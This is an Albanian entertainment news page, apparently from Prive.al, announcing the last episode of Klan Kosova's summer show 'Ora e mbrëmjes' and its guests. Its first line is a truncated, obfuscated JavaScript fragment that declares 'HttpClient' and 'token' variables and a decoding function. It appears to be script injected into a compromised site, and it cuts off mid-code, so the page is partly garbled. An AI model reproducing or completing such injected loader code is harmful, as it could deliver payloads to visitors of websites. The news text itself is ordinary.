;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘ORA E MBRËMJES’ PËRMBYLLË SEZONIN

By

Që nga 22 Qershori, çdo mbrëmje nga e hëna në të mërkurë në ekranin e Klan Kosovës erdhi ‘Ora e mbrëmjes’, emision nga Njomza Aliu që servoi para publikut një koncept unik të programeve verore.

Shumë fytyra publike shfaqën talentin e tyre në pikturë, ndërruan profesion dhe shpalosën arritjet dhe sukseset në karrierë.

Rrugëtimit të këtij emisioni i vie fundi sot me një emision me përplot materiale interesante.

Alaudin Hamiti, drejtor i Klan Kosova flet për sezonin e ri televiziv që nis në Shtator dhe mes të tjerash zbulon se çfarë fshihet pas akronimit NIN, që tash e një kohë transmetohet si promo në televizion.

Në pjesën e pikturës, sonte talentin do ta shfaqë gazetari Milaim Zeka. Duke e njohur natyrën e tij pa komplekse do të jetë mjaft interesante për të parë se çfarë do pikturojë ai.

Gjon Karrica, artisti që në këngët e tij trajton tema të pashtjelluara e të konsideruara tabu do të flasë lidhur me projektin e tij të ri të titulluar ‘E du një virgjëreshë’ që pason ‘Sex toy’ të cilin Karrica e solli në duet me Jessy Hennessy.

Kurse në rubrikën e ndërrimit të profesioneve, Blero i cili së fundmi nisi të këndojë edhe nëpër dasma do provojë veten në rolin e grimerit.

Të gjitha këto dhe jo vetëm mund t’i ndiqni sonte në terminin e rezervuar duke filluar nga ora 21:00. /Prive.al/

Screenshots_2015-08-05-17-11-47

Artikuj të ngjashëm